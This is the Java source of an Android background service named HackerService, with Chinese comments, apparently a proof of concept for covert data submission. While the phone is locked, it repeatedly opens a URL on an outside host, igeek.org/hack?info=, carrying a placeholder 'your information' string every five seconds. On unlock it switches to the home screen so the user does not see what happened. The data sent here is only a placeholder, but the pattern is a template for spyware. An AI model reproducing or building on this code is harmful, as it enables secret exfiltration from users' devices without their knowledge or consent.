package org.igeek.hack.service;

import java.util.Random;
import android.app.KeyguardManager;
import android.app.Service;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.net.Uri;
import android.os.Handler;
import android.os.IBinder;
import android.util.Log;

/**
 * 
 * @author 作者 E-mail:hangxin1940@gmail.com
 * @version 创建时间：2012-01-13 下午10:42:11
 * 类说明
 */
public class HackerService extends Service {
	private ScreenOnBroadcastReciver soReciver;
	private ScreenOFFBroadcastReciver sfReciver;
	private Handler handler;
	
	final static String LOG_TAG="hack";
	KeyguardManager keyguardManager;
	Intent it;
	
	final String HACK_URL="http://www.igeek.org/hack?info=";
	
	
	
	private Runnable r=new Runnable() {
		
		@Override
		public void run() {
			
			
			//如果是锁屏状态
			if(keyguardManager.inKeyguardRestrictedInputMode()){
				String hackInfo="hack!!!!your information!!!!!!!&r="+new Random().nextFloat();
				it.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
				Uri uri=Uri.parse(HACK_URL+hackInfo);
				it.setData(uri);
				startActivity(it);
				Log.i(LOG_TAG,"提交数据->"+HACK_URL+hackInfo);
				handler.postDelayed(r, 5000);
			}				
		}
	};
	
	
	
	@Override
	public void onStart(Intent intent, int startId) {
		super.onStart(intent, startId);
		
		keyguardManager = (KeyguardManager) getSystemService(Context.KEYGUARD_SERVICE);
		it=new Intent(Intent.ACTION_VIEW);
		
		handler=new Handler();
		
		Log.i(LOG_TAG, "开机完成，注册广播接收者");
		soReciver=new ScreenOnBroadcastReciver();
		sfReciver=new ScreenOFFBroadcastReciver();
		
		IntentFilter onIntentFilter = new IntentFilter("android.intent.action.SCREEN_ON"); 
		registerReceiver(soReciver, onIntentFilter);  
		
		IntentFilter offIntentFilter = new IntentFilter("android.intent.action.SCREEN_OFF"); 
		registerReceiver(sfReciver, offIntentFilter);  
	}
	
	
	@Override
	public IBinder onBind(Intent intent) {
		return null;
	}
	
	/**
	 * 解锁广播接收者
	 * @author hang
	 *
	 */
	class ScreenOnBroadcastReciver extends BroadcastReceiver {

		@Override
		public void onReceive(Context context, Intent intent) {
			
			Log.i(LOG_TAG, "屏幕解开");
			handler.removeCallbacks(r);
			intent.setAction(Intent.ACTION_MAIN);  
			intent.addCategory(Intent.CATEGORY_HOME); 
			intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
			
			Log.i(LOG_TAG, "转向HOME");
			startActivity(intent);
			
		}
		
	}
	
	/**
	 * 锁屏广播接收者
	 * @author hang
	 *
	 */
	class ScreenOFFBroadcastReciver extends BroadcastReceiver {
		
		@Override
		public void onReceive(final Context context, Intent intent) {
			
			
			
			Log.i(LOG_TAG, "屏幕锁住");
			handler.postDelayed(r, 500);
		}
		
	}
}
